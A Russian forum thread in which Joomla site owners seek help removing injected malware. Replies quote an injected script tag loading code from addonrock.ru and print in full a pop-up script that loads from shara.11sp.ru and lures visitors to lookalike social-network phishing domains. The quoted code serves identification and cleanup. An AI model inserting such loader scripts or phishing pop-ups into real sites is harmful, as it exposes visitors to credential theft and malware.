На сайте, на Joomla 1.5, вирусы.

Тема в разделе "Ошибки при работе с Joomla", создана пользователем KpyTou, 05.10.2010.

  1. Offline

    KpyTou Недавно здесь

    Регистрация:
    20.01.2010
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Мужской
    Здравствуйте специалисты. Я в деле программирования сырой, и вот с каими неприятными вещами пришлось столкнуться на своём сайте - судя по всему у меня вирусы.

    Включил вывод ошибок php проверьте индексную страницу в ней посторонний код "Parse error: syntax error, unexpected '<' in /home/n/nhlgamecen/public_html/index.php on line 90"

    А сегодня добавилось, что в самом тексте на сайте появилось "Notice: Undefined offset: 1 in /home/n/nhlgamecen/public_html/modules/mod_globalnews/helper.php on line 285"


    Ребят, как исправить эти ошибки? Как убрать эти вирусы?
    И второй вопрос, как в дальнейшем защитить себя от них?


    Выходил на связь с хостингом, вот что мне написали:

    Схема заражения следующая: достаточно зайти на зараженный сайт и при
    стандартных настройках безопасности браузера, вирус автоматически установится
    на компьютере пользователя. После этого он начинает отслеживать логины и
    пароли от FTP, высылая их злоумышленникам. Собрав определенное количество
    паролей, запускается специальная программа, которая подключается по FTP к
    каждому сайту и встраивает в начало или конец страниц собственный html-код,
    например, такой:

    <script type="text/javascript" src="http://addonrock.ru/Debugger.js"></script>
     
  2.  
  3. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    Ну соб-но вам правильно ответили, лечите вирусы и меняйте пасс к фтп, лечить заливкой свежей версии джумла поверх с заменой, поиск по фтп любимым приложением вредоносного кода (З.Ы тотал командер юзаете?)
     
  4. Лат
    Offline

    Лат Звоните 8 (905) 778-52-44

    Регистрация:
    31.01.2007
    Сообщения:
    1 745
    Симпатии:
    113
    Пол:
    Мужской
  5. Offline

    koldakov Недавно здесь

    Регистрация:
    22.03.2011
    Сообщения:
    63
    Симпатии:
    0
    Пол:
    Мужской
    Подскажите, кто знает. У меня выскакивает такая картинка. Это вирус или что? Как ее убрать?
    [​IMG]
    http://s019.radikal.ru/i618/1205/6d/1ece806bf774.jpg
     
  6. Oozii
    Offline

    Oozii Недавно здесь

    Регистрация:
    12.05.2012
    Сообщения:
    58
    Симпатии:
    2
    Пол:
    Мужской
    Поставь блокировку на всплывающие окна, баннеры и т.д. в мозиле блокируется 1-2 плагинами..
     
  7. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    На твоем сайте?
     
  8. Offline

    Airis Недавно здесь

    Регистрация:
    13.03.2010
    Сообщения:
    452
    Симпатии:
    18
    Пол:
    Женский
    Oozii странный совет, если эта картинка выскакивает на его сайте.
     
    Последнее редактирование: 14.05.2012
  9. Oozii
    Offline

    Oozii Недавно здесь

    Регистрация:
    12.05.2012
    Сообщения:
    58
    Симпатии:
    2
    Пол:
    Мужской
    Не осмотрительно запостил не уточнив в чем суть, но с другой стороны мы так и не узнали где этот скрипт живет, на его сайте или нет.
     
  10. Offline

    koldakov Недавно здесь

    Регистрация:
    22.03.2011
    Сообщения:
    63
    Симпатии:
    0
    Пол:
    Мужской
  11. Offline

    koldakov Недавно здесь

    Регистрация:
    22.03.2011
    Сообщения:
    63
    Симпатии:
    0
    Пол:
    Мужской
    Ладно у себя я закрою, но она же у других тоже выскакивает.
     
  12. Offline

    Airis Недавно здесь

    Регистрация:
    13.03.2010
    Сообщения:
    452
    Симпатии:
    18
    Пол:
    Женский
    Ну, если это не вы поставили себе это - значит у вас вирус. Где-то на вашем сайте есть ссылка на shara.11sp.ru/popup-sn/js.php Найдите и удалите. И еще, смените пароль на админку и на хостинге.
     
  13. Offline

    koldakov Недавно здесь

    Регистрация:
    22.03.2011
    Сообщения:
    63
    Симпатии:
    0
    Пол:
    Мужской
    А где то, это где сожет быть? С чего начинать поиск?
     
  14. Offline

    koldakov Недавно здесь

    Регистрация:
    22.03.2011
    Сообщения:
    63
    Симпатии:
    0
    Пол:
    Мужской
    Поменял пароль и не могу зайти!!
     
  15. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
  16. Oozii
    Offline

    Oozii Недавно здесь

    Регистрация:
    12.05.2012
    Сообщения:
    58
    Симпатии:
    2
    Пол:
    Мужской
    Ни в админку ни в панель управления на хостинге?.. БД еще живая?
    -
    Да и возможно стоит пользоваться плагином "akeeba backup" например.. куда проще восстановить потерянные или испорченные файлы из бэкапа.
     
  17. Offline

    RRdev Недавно здесь

    Регистрация:
    16.05.2012
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    Если нормальный платный хостинг:
    1) сменить FTP пароль
    2) если есть доступ по SSH зайти и тупо поискать по всему сайту где произведено инжектирование вредоносного кода, что искать вам уже подсказали можно просто фразу "shara.11sp.ru"
    3) если доступа по SSH нет, можно слить все файлы сайта к себе на локальный комп и опять же произвести поиск
    4) найдя подпорченные файлы удалить вредоносный код, у вас он судя по всему будет в конце файла,
    иногда бывает в начале (в середине не бывает, так что искать легко)

    Если так делать лень и опять же хостер нормальный у которого есть бекапы за разные периоды жизни сайта, то вспомнить когда с сайтом было все ок, найти бекап за ближайшую дату и развернуть его.
     
  18. shahin
    Offline

    shahin р-т => Cпециалист <=

    Регистрация:
    22.04.2010
    Сообщения:
    438
    Симпатии:
    38
    Пол:
    Мужской
    на самом конце index.php смотрете есть такой код жавы
    Код (html):
    1. <script type="text/javascript">
    2.     //Настройки
    3.     var aff_fid=4217;
    4.     var aff_delay=3;
    5.     var aff_cookie_max_views=5;
    6.     var aff_cookie_expires=2;
    7.    
    8.    
    9.     var aff_style =["od","vk","mail","fb"];
    10.     var aff_style_url = ["odonokklasniki.ru","vkonntakate.ru/","mail-moimir.ru/my/","facebokke.ru"];
    11.     var aff_style_num=1;
    12.    
    13.    
    14.     var aff_l_domain="11sp.ru";
    15.    
    16.     //Кнопки
    17.     var aff_close="Закрыть";
    18.     var aff_new_message="1 новое сообщение!";
    19.     var aff_online="Онлайн";
    20.     var aff_add_friend="Добавить в друзья!";
    21.    
    22.     ////Тексты сообщений, имена и фотки
    23.     var aff_name_arr=["Анастасия Мельникова","Ольга Прокашева","Настя Архипова","Ольга Ртутнева","Екатерина Волчкова"];
    24.     var aff_name=aff_name_arr[Math.floor(Math.random()*aff_name_arr.length)];
    25.    
    26.     var aff_message_arr=["Привет, не против познакомиться?","ММмм..привет!!","Давно не виделись!","Мы знакомы?","Ой, кажется, мы встречались! Или что-то путаю?","Удиви меня!"];
    27.     var aff_message=aff_message_arr[Math.floor(Math.random()*aff_message_arr.length)];
    28.    
    29.     //ссылки на аватарки
    30.     var aff_avatar_arr=["http://11sp.ru/popup_sn/avatars/avatar0.jpg","http://11sp.ru/popup_sn/avatars/avatar1.jpg","http://11sp.ru/popup_sn/avatars/avatar2.jpg","http://11sp.ru/popup_sn/avatars/avatar3.jpg","http://11sp.ru/popup_sn/avatars/avatar4.jpg","http://11sp.ru/popup_sn/avatars/avatar5.jpg","http://11sp.ru/popup_sn/avatars/avatar6.jpg","http://11sp.ru/popup_sn/avatars/avatar7.jpg","http://11sp.ru/popup_sn/avatars/avatar8.jpg","http://11sp.ru/popup_sn/avatars/avatar9.jpg"]; //url на аватарку
    31.     var aff_avatar=aff_avatar_arr[Math.floor(Math.random()*aff_avatar_arr.length)];
    32.    
    33. </script>
    34. <script type="text/javascript" src="http://shara.11sp.ru/popup_sn/js.php"></script>

    удалите. на вашем сайте нет вируса. а просто сайт взломали и внедряли свои коды.
     
  19. shahin
    Offline

    shahin р-т => Cпециалист <=

    Регистрация:
    22.04.2010
    Сообщения:
    438
    Симпатии:
    38
    Пол:
    Мужской
    выход из этой проблемы:
    удалить все что внедрено.
    искать в папке images (и в подпаках тоже) файлы с расширениям shell, php и т.д. и удалить. может быть у файла не будет расширения shell так как если злоумышленник знает путь до файла то может вызвать тот же файл с другим расширением. так что смотреть надо вноимательно если есть файл который не вы не сами туда закинули.
    очистить папку кэш и темп.
    закрыть прямой доступ к папкам сайта.
    скрыть админку.
     
  20. Offline

    RRdev Недавно здесь

    Регистрация:
    16.05.2012
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    В index.php может и не быть этого "кода жавы", он может подгружаться. А вот указание на домен "11sp.ru" точно должно быть, поскольку подгрузка идет оттуда.
     
  21. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    Вы шаблоны не с варезных сайтов брали? Сейчас там любят вставлять в шаблоны левые ссылки, заменяя например навигацию по страницам. Ссылки как правило кодируются в BASE 64
     

Поделиться этой страницей

Загрузка...